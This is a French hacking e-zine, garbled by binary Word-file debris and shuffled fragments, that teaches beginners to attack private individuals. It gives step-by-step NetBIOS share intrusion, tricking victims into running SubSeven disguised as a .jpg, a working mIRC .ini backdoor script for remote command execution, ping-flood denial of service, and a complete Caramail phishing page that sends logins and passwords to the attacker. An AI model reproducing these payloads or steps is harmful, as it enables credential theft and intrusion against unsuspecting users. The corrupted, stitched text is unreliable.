ࡱ                >  	                                                            	   
         
                                                             !   "   #   $   %   &   '   (   )   *   +   ,   -   .   /   0   1   2   3   4   5   6   7   8   9   :   ;   <   =   >   ?   @   A   B   C   D   E   F   G   H   I   J   K   L   M   N   O   P   Q   R   S   T   U   V   W   X   Y   Z   [   \   ]   ^   _   `   a   b   c   d   e   f   g   h   i   j   k   l   m   n   o   p   q   r   s   t   u   v   w   x   y   z   {   |   }   ~         R o o t   E n t r y                                                   	           F            [fG@         W o r d D o c u m e n t                                                                                    u      C o m p O b j                                                                                           n                                                                                                                              er n'est pas une chose aussi facile, il faut dj tre un vrai pro de la programmation, et connatre son Assembleur sur le bout des doigts... (voir chapitre 22)
Les script kiddies: Voir chapitre 17
Les hackers: Les pirates d'Internet... Je ne vais pas vous rpeter la dfinition d'un hacker, revenez donc en arrire  :))
De plus en plus de gens veulent devenir des hackers, mais peu d'entre eux le sont rellement. Alors, comment le devenir? Comment passer du stade newbie au stade hacker?  Cette transition se fait principalement par un point des plus essentiels du mileu du hacking: La programation. Un hacker, avant tout, est un gnie de la programmation, que cela vous dplaise ou non. Bien sur y'a pas que a, on peut trs bien utiliser un programme sans savoir comment il marche... Mais vous ne deviendrez jamais un grand hacker si vous ne programmez pas. Mais bon, je ne m'attarderais pas plus logtemps  ce sujet. Reportez vous au chapitre sur la programmation. 
Sachez aussi que beaucoup de gens se prtendent hackers, alors, comment reconnatre un VRAI hacker? Normalement un hacker ne vous dira jamais ce qu'il est relement, n'allez donc surtout pas croire les blaireaux avec des  nick (=pseudos, mais a, vous tes censs le savoir) genre hacker-mania, hackman... Et n'ecoutez pas non plus les crtins qui se ramnent sur les chats en gueulant "Je suis un hacker,je suis le meilleur de tous les pirates", ces gens l sont gneralement des gros lammers, mais il se peut quelquefois qu'ils soient relement des hackers (mais bon c'est trs rare hein). Donc, pour rsumer, un vrai hacker, en gnral, essaiera d'tre le plus discret possible... Bon, si voulez progresser va falloir vous y mettre srieusement, lire des zines, poser des questions sur #hack ou #hack.fr.
Bienvenue dans l'underground...




2/Internet, structure (introduction au modle O.S.I)

Bon, mme si le titre peut sembler barbare pour certains d'entre vous, cette partie n'en est pas moins indispensable.
Sachez dj que Internet repose sur le protocole TCP/IP  (Transmission Protocole/Internet Protocole) , qui recouvre lui-mme d'autres protocoles. Internet est avant tout un ensemble de rseaux interconnects par divers moyens (cartes rseau, satellites...). On va commencer par une des choses les plus importantes, caractrisant le protocole TCP/IP: C'est l'adresse IP. Techniquement, une adresse IP est un champ de 32 bit, dfini en 4 champ de 8 bits spars par des points (allant de 0.0.0.0  255.255.255.255), dont les 8 premiers dfinissent la classe du rseau et les 24 suivant identifient des sous rseaux et des machines. Par exemple, supposons que vous soyez sur Wanadoo, et que votre IP soit 80.9.33.245 (pas de soupons, c'est la mienne lol),alors 80 dfinit la classe du rseau, 9 le sous rseau, 80.9 correspond donc  Wanadoo et les 2 derniers champs, 33.245, correspond  votre localisation et  votre identification sur le Net. Ba oui, z'etes pas aussi en scurit que a sur le net   :))  . Et comment ca se fait qu'on puisse me localiser avec des simples numros, me demanderiez vous? Simple, en convertissant votre adresse IP en une adresse TCP , par une simple conversion dns, il existe des mthodes pour a, mais je suis trop feignant pour vous les expliquer, vous trouverez bien de vous mme. Alors, par exemple, la conversion de 80.9.33.245 en adresse TCP va donner Mix-Tours-111-1-245.abo.wanadoo.fr. Z'avez vu a? Votre rgion et votre fournisseur sont indiqus. Les numros 111-1-245 ont aussi une signification mais je ne sais pas laquelle, peut tre  une identification plus prcise... Mais il faut savoir que certaines adresses peuvent tre fixes, c'est le cas des adresses http, qui ont une ip bien particulire et qui ne change pas. Car, et j'ai oubli de vous le prciser, votre adresse IP change  chaque connection. Il existe galement des ip qui ont une signification bien prcise. Par exemple, 127.0.0.1 correspond  votre "localhost". Si vous vous connectez dessus, vous vous connecterez sur votre propre pc. C'est le cas pour tous les utilisateurs connects sur interneܥe #               V  x u                 Eu                                 ,t l   ,t l                                   t                                             t 
   
t 
                (t                                                            t                                                    t T   t                                               T '                                                                                                                                                                                                                                                                                              Times New Roman    Symbol      Arial     Times New Roman    Symbol 0    Courier New      Arial      Times New Roman      Courier New      Small Fonts Hack Zine
By [Kefka]

Sommaire

1/Introduction
2/Internet, structure  (introduction au modle O.S.I)
3/Piratage d'un particulier: comment trouver l'ip de quelqu'un
4/Piratage d'un particulier: la mthode par Netbios
5/Piratage d'un particulier: les trojans
6/Piratage d'un particulier: le nuke
7/Piratage d'un particulier: les fake-mail
8/Piratage d'un particulier: les virus
9/Hack sous IRC/ICQ
10/Architecture de Linux (unix)
11/Piratage d'un site: introduction
12/Piratage d'un site: hack par ftp
13/Piratage d'un site: exploiter les failles wingate
14/Piratage d'un site: exploiter les failles cgi
15/Piratage d'un site: hack par Telnet
16/Piratage d'un site: comment s'attaquer  un routeur
17/Piratage d'un site: approche de script kiddie
18/Comment cacher son identit sur le net: les mails anonymes
19/Comment cacher son identit sur le net: le spoofing
20/Comment cacher son identit sur le net: l'aprs root
21/La programmation, ce qu'il faut savoir matriser
22/Introduction au cracking, manipuler l'Assembleur (ASM)
23/L'art du sniffing
24/Le social engeneering
25/Conclusion


Disclaimer: Ces informations sont  titre purement ducatif, je ne serais en aucun cas responsable de ce que vous pourriez faire avec . Tout acte ou tentative de piratage est reprim par la justice.   HackZine, [Kefka]


1/Introduction

Ce mag est mon tout premier zine dans le domaine du hack. J'exposerais donc ici toutes mes conaissances dans le milieu. Commentaires, suggestions, crivez moi  nickairmax@caramail.com.
D'ou provient le hack? Il y'a encore quelques vingtaines d'annes, Internet etait un reseau trs complexe, encore trs misterieux. Il tait utilis par les gouvernements americains, et non-accesible au grand public. Ce sont des universitaires, des hackers, qui ont dmocratiser Internet!!! Il faut savoir que sans eux, vous n'auriez jamais soupconner l'existence de ce rseau. Et vous ne seriez donc pas assis tranquilement dans votre fauteuil  lire ce zine... Mais le phnomne Internet tout public, lui, remonte au mileu des annes 90. Internet est aujourd'hui devenu un mdia  part entire, et le fait de pouvoir "matriser" ce nouveau moyen de communication est une des raisons qui poussent certains (ou parfois mme certaines, mais c'est encore trop rare... ;-))  vouloir devenir un hacker. Ce qui est dommage, c'est que beaucoup de gens (en particulier des journalistes) se font une mauvaise ide du hacking en gneral. Pourquoi donc tant de haine envers la communaut hacker? Cela peut justement s'expliquer par le fait que les origines d'Internet soient encore un peu sombres pour certains, et le plus souvent, on a peur de ce que l'on ne matrise pas... Mais qu'est qu'un hacker au juste? Par dfinition, un hacker est un pirate informatique qui cherche les failles de chaque systeme afin de pouvoir les exploiter.
Mais il faut savoir differencier les types de pirates. On distingue:
Les crashers: Les "mchants" hackerz. Ils introduisent des systemes dans le seul but de les dtruire. Leur mentalit est heuresement trs rare et souvent rejete par la communaut Hackerz.
Les newbies: Les dbutants du H/P/C (hacking, phreaking, cracking), contrairement aux lammers*, ils essayent de progresser tout en respectant les autres, sans se la jouer Mitnick...
Les lammers, ou cOwbOyz: Les branleurs de l'underground... Ils se prennent tous pour des grands hackers alors que tout ce qu'ils savent, c'est nuker, ou bien rien du tout. Ils passent pour de vrais bouffons, et le pire c'est qu'ils ne s'en rendent mme pas compte      :p
Les crackers: Les crackers crackent des programmes (quoi de plus logique lol) afin de faire sauter des protections, des mot de passe de registration, etc... Mais devenir crackt, n'ayez crainte. Donc, pour les autres, votre ip ne sera pas 127.0.0.1. Pour connatre votre adresse IP c'est trs simple, si vous avez win95, win98 ou win2000 allez dans Dmarrer/Executer et tapez "winipcfg". Vous aurez donc votre IP. Mais qu'est ce que cette IP a t-elle  voir avec le domaine du hacking? Mouarf, si vous vous posez cette question c'est vraiment que vous ne savez RIEN lol. Jetez un coup d'oeil sur le chapitre consacr au piratage d'un particulier et vous vous rendrez compte  combien c'est chouette de connatre l'ip de quelqu'un...              :-)

Bon, passons  autre chose, de plus technique. Vous savez donc que Internet repose sur le protocole TCP/IP mais comment celui-ci est il dfini? Sachez que TCP/IP est dfini par un modle O.S.I., instaur par le S.I.O. (International Standard Organization). Ce modle est compos de 7 couches, application, prsentation, session,transport,rseau,liaison et physique. Voila donc  quoi ressemble un modle de rference O.S.I.:
 
     #########################
	#				       
	# COUCHE APPLICATION    
	#			           
	##########################
	#				        
	# COUCHE PRESENTATION    
	#			            
	##########################
	#			            			
	# COUCHE SESSION         
	#			            
	##########################
	#			            
	# COUCHE TRANSPORT     
  	#		                                   
	##########################
	#			            
	# COUCHE RESEAU	        
	#			            
	##########################
	#			            
	# COUCHE LIAISON	        
	#		                
	##########################
	#			            
	# COUCHE PHYSIQUE	        
	#			            
	##########################



COUCHE APPLICATION : La couche application constitue le niveau dans la hirarchie des protocoles o rsident les accs des processus rseau de l'utilisateur.

COUCHE PRESENTATION : Lorsque les applications cooprent entres elles, elles changent certaines informations. Elles doivent donc dterminer comment reprsenter ces donnes. Dans le modle OSI, cette couche fournit les routines de prsentation des donnes standardises. Cette fonction est souvent assure directement  l'intrieur de l'application, bien que de plus en plus de protocoles TCP/IP tels que XDR et MIME effectuent cette opration.

COUCHE SESSION : Comme pour la couche prsentation, cette couche n'est pas identifiable sous la forme d'une couche indpendante au niveau de la hirarchie TCP/IP. Cette couche gre les connexions entre les applications. Avec TCP/IP, cette fonction se ralise bien souvent dans la 
couche de transport et le terme de session n'est pas utilis. Pour TCP/IP, les termes "sockets" et "ports" sont utiliss pour dcrire la voie  suivre pour que les applications puissent communiquer 
entres elles.

COUCHE TRANSPORT : Cette couche du modle OSI garantit que le rcepteur reoit les donnes telles qu'elles ont t envoyes. Avec TCP/IP cette fonction est ralis avec TCP. Toutefois, TCP/IP offre un second service de transport, UDP (User Datagram Protocol) qui 
n'effectue pas les vrifications finale de bonne communication.

COUCHE RESEAU : Cette couche gre les connexion  travers le rseau et isole les protocoles des couches suprieure des dtails du rseau sous-jacents. Le protocole IP, qui isole les couches suprieures du rseau et qui gre les adresses ainsi que la transmission de donnes est gnralement dcrit comme la couche rseau TCP/IP.

COUCHE LIAISON : La possibilit de diffuser les donnes  travers le rseau physique sous-jacent est gre par cette couche. TCP/IP cre trs rarement des protocoles situs dans cette couche.

COUCHE PHYSIQUE : Elle dfinit les caractristiques du matriel ncessaire  la propagation du signal. Par exemple, les niveaux lectriques, le nombre et la position des broches au niveau de l'interface sont dfinis dans cette couche.

Pour le protocole TCP/IP le modle O.S.I qui le caractrise prendra moins de couches:

    ########################
         #			                   
         # COUCHE APPLICATION    
	#	                                      
	#########################
	#				          
	# COUCHE TRANSPORT      
	# MACHINE A MACHINE      
	#			                   
	#########################
	#			      
	# COUCHE INTERNET       
	#			      
	#########################
	#			      
	# COUCHE RESEAU         
	#			      
	#########################


Comme dans le modle OSI, les donnes sont transmises vers le bas de la pile lorsqu'elles sont mises sur le rseau; et vers le haut de la pile lorsqu'il s'agit d'une rception de donnes. La structure  4 niveaux de TCP/IP est reprsent suivant la manire selon laquelle les donnes sont gres et transmise vers le bas de la pile de la couche application vers la couche rseau physique. Chaque couche de la pile ajoute certaines informations de contrles pour s'assurer de la bonne livraison des donnes. Ces informations sont appeles "en-ttes" car elles sont places avant les donnes  transmettre. Chacune des couches considre toutes les informations reu d'une couche suprieure comme tant des donnes et place sa propre en-tte juste avant. L'ajout successif d'informations a chacune des couches est appel "encapsulation". Lorsque des donnes sont reues, c'est le mcanisme inverse qui se met en place. Chaque couche retire son en-tte avant de communiquer les donnes  la couche suprieure. Comme les informations remontent les diffrentes couches, les informations reues de la couche infrieure de la pile sont interprtes comme tant constitues d'une en-tte et de donnes.
Et voil un descriptif de chacune de ces couches:


LA COUCHE RESEAU:  La couche rseau est la couche la plus basse de la hirarchie des protocoles TCP/IP. Les protocoles de cette couche fournissent les moyens ncessaire au systme pour envoyer les donnes aux priphriques physique directement connects au rseau. Les fonctions raliss  ce niveau incluent l'encapsulation de datagrammes IP dans des trames transmises sur le rseau et la correspondance entre adresse IP et adresse MAC. En effet, les adresses IP doivent tre converties en une adresse approprie pour le rseau physique  travers lequel le datagramme va circuler.


LA COUCHE INTERNET: La couche au-dessus de la couche rseau de la hirarchie des protocoles est la couche internet. IP constitue le coeur mme de TCP/IP et il s'agit du protocole le plus important de la couche 
internet. IP fournit le service de base en matire d'expdition de paquets sur lequel les rseaux TCP/IP sont btis.


LA COUCHE TRANSPORT: Les deux protocoles les plus importants dans cette couche sont TCP et UDP (User Datagram Protocol). TCP fournit un service de transmission de donnes dit fiable avec un systme de dtection et de correction d'erreurs. UDP fournit un service de transmission de datagramme en mode non connect.


LA COUCHE APPLICATION: Au sommet de la hirarchie des protocoles TCP/IP se trouve la couche application. Cette couche inclut tous les processus qui utilisent les protocoles de la couche transport pour transmettre de l'information. Il existe un grand nombre de protocoles applicatif de ce genre. La plupart fournissent des services utilisateurs et de nouveaux services sont rgulirement ajouts  cette couche.

Les protocoles applicatifs les plus connus sont :
          - Telnet : permet d'effectuer des login distants  travers le rseau. 
	- FTP : Utilis pour transfrer des fichiers d'une manire interactive.
	- SMTP : Protocole de transport de mails .                                                                                   
          - HTTP : Permet de diffuser des pages web  travers le rseau.   
	- DNS : Permet la rsolution des adresses IP en fonction du nom de machine. 
	- NFS : Permet aux fichiers d'tre partags par plusieurs machine connectes au rseau.


Bon, voil je pense que ca devrait vous suffir. Matriser le protocole TCP/IP vous permettra d'tre dj bien avanc. Maintenant passons au hacking proprement dit...




3/Piratage d'un particulier: comment trouver l'ip de quelqu'un

Bon, avoir votre adresse IP, c'est cool, mais c'est pas qui va vous permettre de hacker quelqu'un,  moins que vous ne soyez compltement masochiste  lol. Alors comment obtenir l'ip de quelqu'un, et dans quel contexte? Il existe des tas de mthode, je vous en propose quelques unes pour commencer, pas trop compliques:

1re mthode: Et aussi la plus simple... Il faut d'abord que vous ayez un client IRC. Ensuite, sur quelconque chat, tapez (les > ne sont pas  taper):
>/dns user (le pseudo du type dont vous voulez son ip)
Et vous aurez son ip. Pour ceux qui ont pas la force de taper a sur leur clavier vous pouvez mettre en surbrillance un nick et aller dans "infos" ca reviendra au mme. Si vous tombez sur autre chose qu'une adresse IP, genre une adresse TCP, allez sous DOS, et faites:
>ping -A adressetcp
Et l'ip de votre victime vous sera communique..
Cette mthode est la plus efficace et la plus sre, mais bon, vous ne possedez pas forcment de client IRC et vous tes peut tre trop press pour commencer un telechargement maintenant...       :))

2me mthode: Sur Caramail, quand vous recevez un mail, allez dans l'onglet "enttes" , situ en haut du message. Et vous aurez l'ip de votre correspondant mouarf...

3me mthode: Il faut dj que vous soyez equip d'un no-nuker genre NukeNabber qui vous donnera l'ip de votre agresseur en cas d'attaque... Maintenant, sur un chat, tapez ce lien, incitant votre victime  cliquer dessus :
>ftp.votre_ip
Tapez ce lien en message priv, et  quelqu'un qui ne s'y connait pas, parce que sinon il se pourrait que vous vous fassiez nuker sur un port que vous aviez oublier de proteg    ;-)

4me mthode: Faites gaffe, cette mthode peut tre dangeureuse pour votre lecteur de disquette... Partagez votre lecteur A en accs complet et donnez lui comme nom de partage SEX_PICTURES par exemple... Quand vous aurez un visiteur sur votre lecteur de disquettes, il se mettra  faire du bruit... Pour connatre l'ip du hacker cochon (lol) qui squatte votre lecteur, allez sous DOS et tapez "netstat". Il se peut que la fenetre disparaisse pour eviter cela appuyez sur la touche ImprEcran de votre clavier, allez dans Word ou dans Paint et faites un coller. Vous aurez l'adresse IP du povre petit hacker...                 :-(

5me mthode: Sous ICQ, mettez en surbrillance un pseudo quelconque et cliquez sur la fleur bleue afin de quitter le chat. Reconnectez vous sur votre client ICQ et vous aurez l'ip du type dont vous aviez mis le pseudo en surbrillance... Cette astuce ne fonctionne que sur la version d'ICQ 98.

6me mthode: La plus conne, pour avoir l'ip de quelqu'un, il suffit de lui demander... Demandez donc  quelqu'un sur un chat de vous communiquez leur adresse son adresse IP. Si il rpond: "c'est quoi adresse IP" ou encore qu'il vous donne son adresse e-mail (arf) c'est pratiquement dans la poche. Ne lui dites pas ce que c'est, et demandez lui d'aller dans Dmarrer/Executer et de taper winipcfg, puis demandez lui de vous la donner. Si il fait tout ce que vous lui demandez, c'est que vous tes tombs sur un oiseau (pigeon...) rare. Profitez en !!!     :-D

7me mthode: Sur un serveur irc, quand vous recevez une proposition d'envoi de fichier par dcc send, allez dans statut pour connatre l'ip du type qui essaye de vous refourger un fichier. Cette astuce est trs utile pour trouver des ip de gens sur des serveurs irc dont la conversion dns est crypte, comme c'est le cas pour irc.jeuxvideo.com par exemple. (Remerciements a Userknown, au passage    ;-)  ).

8me mthode: Avec MsgManager, quand vous reevez un fichier, acceptez le, puis allez dans "commandes dos" et tapez netstat. Vous pourrez voir l'host de votre expditeur, il ne vous restera plus qu' faire la conversion dns pour trouver son ip, en faisant par exemple sous dos, 
>ping -a host


Bon, voil, je pense qu'avez tout a vous devriez pouvoir rcuperer quelques adresse IP. Maintenant, passons  la suite...    :))




4/Piratage d'un particulier: la mthode par Netbios

Les conditions ncessaires:
-Que vous et votre victime ayez installer le partage de fichiers
-Que vous tournez sur Windows 95 ou 98 ainsi que votre victime
-L'adresse IP de votre victime
-Beaucoup de chance et beaucoup de patience    :))

Cette mthode, reposant sur le protocole NETBEUI, reposant lui mme sur NetBios, vous permettra d'avoir accs au disque dur de votre victime, cela en toute lgalit, ce qui est suffisament rare pour tre prcis     :-p
Bon alors, ouvrez une fenetre DOS et tapez:
>NBTSTAT -A 80.9.33.245 (l'ip de votre victime, ici c'est juste un exemple hein   :)) )
Une liste de noms de pc devrait s'afficher (si ce n'est pas le cas changez de cible, elle n'a pas Netbios), exemple:

>NetBIOS Remote Machine Name Table
>Name Type Status
>--------------------------------------------------
>MONORDINATEUR <00> UNIQUE Registered
>MONGROUPE          <00> GROUP  Registered
>MONORDINATEUR <03> UNIQUE Registered
>MONORDINATEUR <20> UNIQUE Registered
>MONGROUPE          <1E> GROUP  Registered
>MAC Address = 44-45-53-54-00-00

Bon, alors, ce qui nous interesse, c'est le nom de pc avec UNIQUE et <20> devant. Si ce nom existe le tour est (presque) jou. Nous allons editer le fichier lmhost.sam , qui convertit les de machines sous NETBEUI en adresses ip. Toujours sous DOS, tapez:
>edit
Tapez le nom du fichier, lmhost.sam . Puis,  l'interieur de ce fichier tapez:
>80.9.33.245 MONORDINATEUR #PRE
L'ip de votre victime, suivi du nom de son pc (celui avec UNIQUE et <20> devant) et de #PRE, qui indiquera que la correspondance entre l'ip et le nom NetBIOS devra passer avant la rsolution DNS. Maintenant, nous allons charger le fichier lmhost.sam. Sauvegarder le, quitter l'diteur et toujours sous DOS, tapez:
>NBTSTAT -R
Et normalement, sauf erreur, vous obtenez:
>Successful purge and preload of the NBT Remote Cache Name Table

Maintenant sortez de DOS aller dans Dmarrer/Rechercher/Ordinateur Distant/puis entrez le nom du pc de la victime. Double cliquez sur son poste de travail et le tour est jou !!!

Ou alors, si vous aimez les complications, restez sous DOS et tapez:
>NET VIEW \\MONORDINATEUR
Une liste de noms de ressources partages s'affichera. Allez donc faire un petit tour sur le C... niark niark... Tapez:
>NET USE \\MONORDINATEUR\C
Et le disque dur de votre victime deviendra un de vos disques libres...
Cette technique, malheureusement, marche de moins en moins souvent et necessite une chance quasi-exceptionelle, cependant vous pouvez toujours essayer... Amusez vous bien !!!    :->




5/Piratage d'un particulier: les trojans

Les conditions ncessaires:
-Que vous possediez un trojan (je vous conseille SubSeven7 ou Socket23 c'est les meilleurs pour commencer. Sinon vous pouvez directement prendre Back Orifice mais je vous le dconseille, il peut devenir trs dangeureux pour votre pc...C'est vous dire sa puissance  :)) )
-Que vous ayez de l'imagination, inventer quelque chose pour que votre victime execute le cheval de troies est tout un art croyez moi lol.
-Que vous ayez un programme vous permettant de changer l'extension de vos applications. Transformer les .exe en .jpg peut tre une chose trs utile croyez moi   arf
-Que votre victime soit un bel abruti  :-o
-Que vous ayez naturellement l'adresse IP de votre victime
-Que vous ayez une conscience: le piratage est svrement puni , arf nan je deconne laissez vous allez        :op

Bon, commenons par une question simple: Qu'est qu'un trojan? Alors comment vous expliquer a... Prenons l'exemple de SubSeven ( croire que c'est mon trojan prfer lol): Il est compos de trois applications. La premire, server.exe, est le cheval de troies, il doit tre install sur le pc de votre victime. La seconde application, Sub7.exe, est le programme qui vous permettra de penetrer dans le pc d'une victime infecte par le cheval de troies. Enfin, la dernire, EditServer.exe, est une application qui vous permettra de proteger l'accs  la machine de votre victime par un simple mot de passe. Mais oublions cette partie l, de plus elle n'est pas disponible sur tous les trojans. Si vous n'etes pas btes je pense que vous avez du comprendre le fonctionnement d'un trojan. En rsum, il faut d'abord infecter le pc de la cible au moyen du cheval de troies, pour ensuite y accder en se connectant sur l'adresse ip de la machine de la victime. Mais, prenons plutt un exemple d'une intrusion classique sur le pc de quelqu'un, sur le chat de caramail :

>NickAirMax: Salut, ca te derangerais pas de m'envoyer un e-mail, tu met rien dedans, c'est juste pour verifier si ma boite de reception dconne plus.
>Pigeon: Ok, attend 2 secondes
>P: Ca y'est tu l'as reu?
Donc, vous avez compris, avec le mail que la victime vous a envoy, vous pouvez facilement obtenir son adresse IP.
>N: Oui ca y'est merci t'es trop sympa. Je t'envoie une photo de MOI pour te rcompenser.. (evidemment si votre victime est un mec, ca va tre un peu plus dur, faites vous donc passer pour une nana lol)
Bon, alors l vous envoyez le cheval de troies  votre victime, en prenant bien soin de changer son extension, de .exe en .jpg     :))
>N: T'as reu?
>P: Attend je vais voir...
>P: Oui ca y'est, merci
>P: Et mais ca marche pas ton truc? Je clique dessus il se passe rien...
Bon, j'espere que vous avez compris. En cliquant sur votre petite saloperie, la victime s'est auto infecte, sans mme s'en rendre compte. Il ne vous reste plus qu' vous connecter sur le pc de la victime avec son ip, par le port du cheval de troies (pour Sub7 c'est 27374).
Vous aurez ensuite accs  des tas de fonctions tout aussi interessantes les unes que les autres, que je vous laisse dcouvrir...   miam miam    B-)

Il existe aussi une variante du trojan sous IRC. Il faut que vous ayez le client MIRC32. Dans le reprtoire contenant votre client, crez un nouveau document texte, donnez lui le nom que vous voulez, ouvrez le, et  l'intrieur tapez (les > ne devant pas tre taps)
>ctcp 1:ech:/echo -a $2-
Enregitrez le en *.ini. Maintenant connectez vous sur MIRC, et tapez sur une fentre de discussion: 
>load -rs votre_fichier.ini

Maintenant envoyez un fichier *.ini  votre victime contenant ceci:

>ctcp 1:*:$1-
>/set %com /ctcp $me
>hatled
>if ($1- == in) {
>/ctcp $nick ech [X Fiction][Je suis infect]
>/clear -s
>/motd
>goto end
>}
>if ($1- == ip) {
>/ctcp $nick ech [X Fiction][iP][$+$ip $+ ]
>/clear -s
>/motd
>goto end
>}
>else {
>/$+$1-
>/ctcp $nick ech [Action: /$+$1-$+] effectue
>/clear -s
>/motd
>goto end
>}
>:end
>/unset %com
>halt
>}  

Ou dites lui de placer la ligne "ctcp 1:*:$1-" dans son remote. 
Votre victime sera donc infecte, et votre backdoor vous permettra de lui envoyer des ctcp sans qu'elle ne s'en apercoive. Voici ce que vous pouvez faire avec ces ctcp:
>/ctcp pseudo ip (pour avoir l'ip de la victime)
>/ctcp pseudo in (pour vrifier si la victime est bien infecte)
>/ctcp pseudo_de_votre_victime JOIN #channel  (pour envoyer votre victime sur un autre salon)
>/ctcp pseudo MSG #channel  (pour le faire parler sur #channel)
>/ctcp pseudo ip  (pour avoir son adresse ip)
>/ctcp pseudo WRITE c:/windows/bureau/nickairmax.exe  (pour crer un fichier sur le bureau de votre victime, essayez de crer un virus par exemple...)
>/ctcp pseudo RUN c:/windows/bureau/nickairmax.exe
Voil, je pense que ca devrait vous suffir...




6/Piratage d'un particulier: le nuke

Ok ca fait pas mal newbie comme technique... Mais je rexplique quand mme  ceux qui n'aurait pas la chance de connatre, le nuke consiste  envoyer tout plein de donnes incomprhensibles sur des ports au hasard afin de provoquer gnralement la dconnection d'une machine. Pour cela vous avez juste besoin d'un nuker (et l je vous recommande MelissaNuke) et d'une adresse IP (prenez aussi un no-nuker en cas de tentative de riposte lol). Laissez le port 139 (vous pouvez quand mme en essayer d'autres), entrez l'adresse IP de votre victime et cliquez sur le bouton "nuke him"...
Trs technique, trs fin... Mais bon, cette technique semble avoir t adopte par un certain nombre de lammerz....  J'ai pas envie de m'attarder plus longtemps sur le nuke, d'autant plus qu'il n y a rien  dire mouarf. Sachez quand mme que le nuke, ca marche pas  tous les coups et que il vaut mieux tre plusiseurs  nuker la mme personne pour plus d'efficacit, et ce n'est pas non plus la peine d'essayer de nuker des modros  :))
C'est vrai que nuker sous IRC, c'est plutt amusant mais  la longue ca devient lassant... Alors je vais vous donner une autre technique, qui aboutira au mme rsultat que le nuke, voire mme en mieux et en de manire plus sre. Allez donc sous DOS et tapez:
>ping -n 65000 127.0.0.1
Aprs -n indiquez le nombre de paquets  envoyer, le plus possible, puis metttez l'ip de votre victime. Attendez quelques instants et le pc de la victime aura rebooter... Cette technique s'apelle le ping overflood. Si vous voulez vous attaquer  un serveur utilisez plutt l'oversize packet. Sous DOS, tapez:
>ping -| 65000 www.nomdusite.com
Cette technique fonctionne rarement, mais ca vaut le coup d'essayer. Si le serveur est bien proteg vous recevrez un message de time out.
Bon, ok, l je me suis un peu loign de mon sujet, mais que vous voulez vous, fallait bien que je vous explique le hack sous DOS quelque part dans ce zine... Voil qui est fait et j'en suis bien content :-)   Passons  la suite...




7/Piratage d'un particulier: les fake-mails

Les conditions ncessaires:
-Avoir un compte quelque part
-Bien matriser le HTML
-Avoir un peu de patience

Bon, le fake-mail, ca consiste en quoi... En gros, envoyer un fake mail, c'est envoyer un e-mail  quelqu'un en se faisant passer pour un administrateur, et en tentant de rcuperer son mot de passe et son login. C'est cool, ca marche bien, mais pour tre plus crdible, mieux vaux avoir une adresse du style admin454@caramail.com, enfin une adresse avec un "admin" dedant, histoire de vous faire passer pour quelqu'un d'important...

Voici un exemple de fake-mail:

Nous sommes dsols cher membre, votre compte a rencontrdes problmes pour les raisons suivantes:Raison: Temps dpassNous vous prions de ractiver votre compte en compltantce formulaire dans les plus brefs dlais.Compte:Mot de passe:Retourner  La page de caramail <http://www.caramail.com/>. 
 2002 caramail. Tout droits rservs

D'ailleurs, en voici le code source:

<html>
<head>
</head>
<html>
<head>
</head>
<body bgcolor="#ffffff" link="#000099" vlink="#000099">
<TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH=100%>
<TR BGCOLOR=#F0E8CC><TD COLSPAN=3><CENTER>
<a href="http://adclick.caramail.com/cgi-bin/redirect?
TYPE=PUB&FROM=60&IDBANDEAU=ZOJ92&PARAMS=03732926184BE00000111408111000010&TARGET=
www.zonejeux.com/groom/" TARGET="_blank">
<img src="http://ad.caramail.com/pub/ZOJ92.gif" alt="" border=0 WIDTH=468 HEIGHT=60></A>
</CENTER>
<IMG SRC="http://195.25.89.17/caramail_v?total" WIDTH=1 HEIGHT=1 BORDER=0><SCRIPT>
<!-- 
tps = new Date(); 
if (tps.getSeconds() < 4) {
document.write(" ");
}
-// --></script>
<center><font face="Arial, Helvetica" size="5">Nous sommes dsols cher membre, votre compte 
a rencontr<br> des problmes pour les raisons suivantes:</font>

<font face="Arial, Helvetica" size="3"><br><br>Raison: </font> 
<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Temps dpass.<br><br>
Nous vous prions de ractiver votre compte en compltant<br> ce formulaire dans 
<u>les plus brefs dlais.</u></b></font><br>
<br>
<font face="Arial, Helvetica" size="2">
<FORM ACTION="http://www.lecgi.net/public/form_mail.cgi" METHOD=POST>
<INPUT TYPE=hidden NAME=destinataire VALUE="votre_login@caramail.com">
Compte:</font><br><input type="text" name="login" size="16" maxlength="16">
<font face="Arial,Helvetica" size="2"><br>Mot de passe:</font><br>
<input type="password" name="passwd" size="16" maxlength="16"><br> 
<input type="submit" value="Enter">
<INPUT TYPE=hidden NAME=sujet VALUE=internic>
<INPUT TYPE=hidden NAME=redirige VALUE="http://www.caramail.com">
</form>
<br>
<br>
<font face="Arial, Helvetica" size="3">Retourner  
<a href="http://www.caramail.com" target="_parent">La page de caramail</a>.
</font><p><font face="Arial, Helvetica" size="1"> 2002 caramail. Tout droits rservs
</font></center> 
<br>
<br>
<br>
</body>
</html>

Vous pouvez bien entendu, l'adaptez  votre guise en rajoutant par exemple le logo de Caramail pour faire plus crdible...   Mais prenez garde, une nouvelle rgle Caramail a t instaure le 02/02/02 (ca sonne bien arf). Dixit:  " Pour conserver la confidentialit de votre bote aux lettres Caramail, ne rvlez jamais votre compte et votre mot de passe Caramail, mme si vous recevez un email venant soi-disant de l'quipe Caramail. Notre quipe de support n'a en aucun cas besoin de votre mot de passe pour vous aider sur Caramail. "   
Mouarf, j'tais pli quand j'ai vu a... D'autant plus que la semaine qui prcedait cette nouvelle rgle, j'avais envoy une bonne centaine de fake-mail... Arf, faut pas que je me sente vis non plus...lol
Donc, avant d'envoyer un fake mail, prenez garde d'indiquer une adresse autre que la votre, avec une fausse identit... Sinon gare, vous pourriez vous faire choper                  :))




8/Piratage d'un particulier: les virus

Bon l, je vais quand mme pas vous rapeller ce que c'est qu'un virus... Qui ne s'est jamais heurt, au moins une fois dans sa cyber-vie,  ce douloureux problme? Je vous le demande... Est il possible de telecharger des virus sur le net, sans mettre hors service son pc? Ba oui, lancez donc une recherche vous verrez bien... Impressionant... Je vous dconseille les virus du type ILoveYou, c'est completement ridicule, prenez plutt des virus qui font MAL plutt que des vieux machins qui vous empechent la lecture de vos fichiers mp3...Qu'est ce qu'on s'en fout? lol
